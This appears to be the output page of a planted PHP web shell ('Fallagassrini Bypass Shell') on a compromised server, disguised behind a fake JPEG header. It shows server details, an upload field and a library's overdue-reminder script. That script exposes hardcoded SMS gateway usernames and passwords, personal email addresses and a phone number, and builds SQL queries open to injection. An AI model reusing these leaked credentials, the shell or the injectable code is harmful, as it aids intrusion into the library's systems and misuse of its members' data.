JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/llm/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/llm/over_duemail.php

<?php 
//include('is_autheticated.php');
include('config.php');
mysql_query("SELECT REPLACE(@@sql_mode,'ONLY_FULL_GROUP_BY','')");
function do_post_request($url, $data, $optional_headers = 'Content-type:application/x-www-form-urlencoded') {

                $params = array('http'      => array(

                                'method'       => 'POST',

                                'content'      => $data,

                                ));

                if ($optional_headers !== null) {

                                $params['http']['header'] = $optional_headers;

                }
                $ctx = stream_context_create($params);
                $response = @file_get_contents($url, false, $ctx);

                if ($response === false) {

                                print "Problem reading data from $url, No status returned ";

                }
                return $response;
}	

function sendSMS($url, $params=array())
{

    $url = $url.'?'.http_build_query($params, '', '&');
    
    $ch = curl_init();
    
    curl_setopt($ch, CURLOPT_URL, $url);
    
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        
    $response = curl_exec($ch);

    echo $response;
    
    curl_close($ch);
    
    return $response;


}
/*$sql="SELECT DISTINCT branch,book_id,book_receipt_id,book_bar_code,member_id,check_out_date,expected_check_in_date,DATEDIFF(DATE(NOW()),expected_check_in_date) AS Count 
	  FROM `check_out_in_history` WHERE `status`='0' AND YEAR(`created_on`)= YEAR(NOW())";*/
	   $d= date('2023-01-01'); //3 months before on 07-11-2022
	 $d2= date('Y-m-d');
	 
	  /*$sql="SELECT DISTINCT member_id,branch,check_out_date,expected_check_in_date,DATEDIFF(DATE(NOW()),check_out_date) AS Count 
	  FROM `check_out_in_history` WHERE (check_out_date between '".$d."' AND '".$d2."') AND `status`='0' AND YEAR(`created_on`)= YEAR(NOW())";*/
	  //AND YEAR(`created_on`)= YEAR(CURDATE())-1
	 $sql="SELECT DISTINCT branch,book_id,book_receipt_id,book_bar_code,member_id,check_out_date,expected_check_in_date,DATEDIFF(DATE(NOW()),expected_check_in_date) AS Count 
	  FROM `check_out_in_history` WHERE (check_out_date between '".$d."' AND '".$d2."') AND `status`='0'  AND
	  branch NOT IN ('23','20','19','29') GROUP BY member_id";
	  // branch IN ('1','11') GROUP BY member_id";
	  echo $sql;
$source=mysql_query($sql);
$rows = mysql_num_rows($source);

if($rows>0)
{
//echo $rows;
echo "<br>";
$i=0;
while($step=mysql_fetch_array($source))
{
  
	if($step['Count']>='1' && $step['Count']<='150')
	{ 

//	echo $i;
//	echo "<br>";
	//  echo $step['Count'];
	//  	echo "<br>";
		if($step['Count']=='1' || $step['Count']=='10' || $step['Count']=='20' || $step['Count']=='30' || $step['Count']=='40' || $step['Count']=='50' || $step['Count']=='60' || $step['Count']=='70' || $step['Count']=='80' || $step['Count']=='90')
		{ 
		//echo $step['Count'];
	    $branch=$step['branch'];
	/*	$book_id=$step['book_id'];
		$book_receipt_id=$step['book_receipt_id'];
		$bar_code=$step['book_bar_code'];*/
		$member_id=$step['member_id'];
		$check_out=$step['check_out_date'];
		$check_in=$step['expected_check_in_date'];
		$count=$step['Count'];
	
				$tot="SELECT  book_id  FROM `check_out_in_history` WHERE `status`='0' AND member_id = '".$member_id."' AND check_out_date = '".$check_out."' 
					  AND YEAR(`created_on`)= YEAR(DATE_SUB(CURDATE(), INTERVAL 1 YEAR))";
				$total=mysql_query($tot);
						
			   $tot_c="SELECT COUNT(book_id) AS TOT FROM `check_out_in_history` WHERE `status`='0' AND member_id = '".$member_id."' AND check_out_date = '".$check_out."' 
					  AND YEAR(`created_on`)= YEAR(CURDATE())";
				$total_c=mysql_query($tot_c);
				$total_count=mysql_fetch_array($total_c);
				
			    $branch_mem="SELECT DISTINCT * FROM `members` WHERE id = '".$member_id."' AND branch LIKE '".$branch."'";
				$branh_srce=mysql_query($branch_mem);
				$branh_step=mysql_fetch_assoc($branh_srce);
				
				$sql2="insert into overdue_mail(branch,member_code,member_name,mail_id,contact_number,landline,mail_date)values('".$branh_step['branch']."','".$branh_step['member_code']."','".$branh_step['member_name']."','".$branh_step['emailid']."','".$branh_step['contact_number']."','".$branh_step['land_line']."',date(Now()))";
				$source1=mysql_query("insert into overdue_mail(branch,member_code,member_name,mail_id,contact_number,landline,mail_date)values('".$branh_step['branch']."','".$branh_step['member_code']."','".$branh_step['member_name']."','".$branh_step['emailid']."','".$branh_step['contact_number']."','".$branh_step['land_line']."',date(Now())");
                $source2 = mysql_query($sql2);
				
			    $bnch_name="SELECT DISTINCT * FROM `branches` WHERE  id = '".$branch."'";
				$bnch_name=mysql_query($bnch_name);
				$bnch_step=mysql_fetch_assoc($bnch_name);
				
					 $member_name=$branh_step['member_name'];
					 $member_code=$branh_step['member_code'];
					 $mem_email=$branh_step['emailid']."<br/>";
					 $branch_name=$bnch_step['branch_name'];
					// $total_book=$sum_total['TOT'];
								
					//$user_email = 'shanmugamkani1994@gmail.com';	
					//$to = 'shanmugamkani1994@gmail.com';	
					//echo "here";
/*$url = 'http://www.meru.co.in/wip/sendsms?';
$mobile=substr($branh_step['contact_number'],-10);
//$mobile='9884422723';
if(preg_match('/^\d{10}$/', $mobile))
{ //echo $mobile;echo $member_code;echo "<br />";
$smessage = 'M ID:'.$member_code.', Dear Member,Reminder for overdue books,kindly return it as soon as possible.Plz ignore if returned.We also do door delivery.ct:044-'.$bnch_step['phone_number'].''; 
$data = 'username=eswlibtxn&password=eswlibtxn&message='.urlencode($smessage).'&to='.urlencode($mobile);
$response = do_post_request($url, $data);
//print $response;exit;
}*/

$mobile=substr($branh_step['contact_number'],-10);//echo $mobile;
if(preg_match('/^\d{10}$/', $mobile))
{
$params = array();
/*	$params['User'] = "elllib";
	$params['passwd'] = "9840366599";
	$params['sid'] = "EASLIB";
	$params['mtype'] = 'N';
	$params['mobilenumber'] = $mobile;
	*/
	
	$datetime = strtotime(time, now);
	$params['uid'] = "easwarilibrary";
	$params['pwd'] = "142525";
	$params['mobile'] = $mobile;
	$params['sid'] = "ELLLIB";
	$params['type'] = 0;
	$params['dtTimeNow'] = date("Y-m-d h:i:sa", $datetime);
	$params['entityid'] = "1201160913760631039";
	$params['tempid'] = "1207162624254384518";
	 
echo "<br >".$params['msg'] = "M ID:".$member_code.", Dear Member, Reminder for overdue books, Kindly return it as soon as possible, Pls ignore if returned, By Easwari Library, ct:".$bnch_step['phone_number']."";
//$res = sendSms('http://login.chennaismsgateway.com/WebServiceSMS.aspx', $params);
$res = sendSms('http://www.smsintegra.com/api/smsapi.aspx', $params);
//exit;
//http://www.smsintegra.com/api/smsapi.aspx?uid=xxxxx&pwd=xxxxx&mobile=xxxxx&msg=xxxxx&sid=xxxxx&type=0&dtTimeNow=xxxxx&entityid=XXXXXXXXXXXXXXXXXX&tempid=XXXXXXXXXXXXXXXXXX
	$i=$i+1;
}

/*M ID:*, Dear Member, Reminder for overdue books, kindly return it as soon as possible, Plz ignore if returned, By Easwari Library, We also do door delivery. ct:*, www.easwarilibrary.in
M ID:*, Dear Member, Reminder for overdue books, Kindly return it as soon as possible, Pls ignore if returned, By Easwari Library, ct:**/

					$user_email = 'support@easwarilibrary.in';							
					$subject = 'Dear Mr./Ms. '.$member_name.'';
					$to = $mem_email;
					//$to = 'shanmugamkani1994@gmail.com';
					$eswari = 'Warm Greetings from  Easwari Lending Library !!!';
					
					$headers  = 'MIME-Version: 1.0' . "\r\n";
					$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
					
					$headers .= "From: ".$user_email."\r\n";
					$headers .= "Reply-To: ".$user_email."\r\n" . 'X-Mailer: PHP/' . phpversion();;
					$headers .= "Return-Path: ".$user_email."\r\n"; 
					$headers .= "CC:damemember@gmail.com\r\n";
					$headers .= "CC:itsureshr@gmail.com\r\n";
					// Create email headers
					/*$headers .= 'From: '.$user_email."\r\n".
					'Reply-To: '.$user_email."\r\n" .
					'X-Mailer: PHP/' . phpversion();
					$headers .= 'Cc: shanmugamkani1994@gmail.com,damemember@gmail.com'."\r\n";*/
					
					$message = '<html><body>';
					$message .= '<p font-size:16px;">ID NO:'.$member_id.'</p>';
					$message .= '<p style="font-size:18px;">Dear Mr./Ms. '.$member_name.'('.$member_code.')</p>';
					$message .= '<p style="color:#080;font-size:16px;">Warm Greetings from  Easwari Lending Library !!!</p>';
					$message .= '<p> <br /> </p>';
					$message .= '<p style="font-size:16px;">Reminder for overdue books. We kindly request you to return it as soon as possible.</p>';
					$message .= '<p> <br /> </p>';
				
					$message .= '<p style="font-size:16px;">Total Number of Books Pending:'.$total_count['TOT'].'.</p>';
					$message .= '<p> <br /> </p>';
					$message .= '<p style="font-size:16px;">Book List :</p>';
	                $message .= '<p style="font-size:16px;"> Check Out Date:'.$check_out.'</p>';
					while($sum_tot=mysql_fetch_assoc($total))
				{
					$book="SELECT * FROM `book` WHERE id = '".$sum_tot['book_id']."'";
					//echo $book. " " .$member_id;
					$book_srce=mysql_query($book);
	
					
					while($book_step=mysql_fetch_array($book_srce))
					{
					//echo $book_step['book_name']."<br>";
					
				
					$message .= '<p> <br />'.$book_step['book_name'].'</p>';
					
					
					}
				}
					$message .= '<p style="font-size:16px;">Please ignore if already returned..</p>';
					$message .= '<p> <br /> </p>';
                    $message .= '<p> <br /> </p>';
					$message .= '<p style="font-size:16px;">With Thanks & Regards.</p>';
					$message .= '<p style="font-size:16px;">Easwari Lending Library -Customer Care.</p>';
					$message .= '<p style="font-size:16px;">Mobile:'.$bnch_step['phone_number'].';</p>';
					$message .= '<p style="font-size:16px;">Mobile: '.$bnch_step['mobile_number'].';</p>';
					$message .= '<p style="font-size:16px;">Email: support@easwarilibrary.in</p>';
					$message .= '<p style="font-size:16px;">Website: easwarilibrary.in</p>';
					$message .= '</body></html>';      
					/*
						   if(mail($to, $subject, $message, $headers, $from ))
							{
								 'Your mail has been sent successfully.';
							}
							else
							{
								  'Unable to send email. Please try again.';
							}
*/
 

					
							
		}
	}  
	}
}  
 ?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net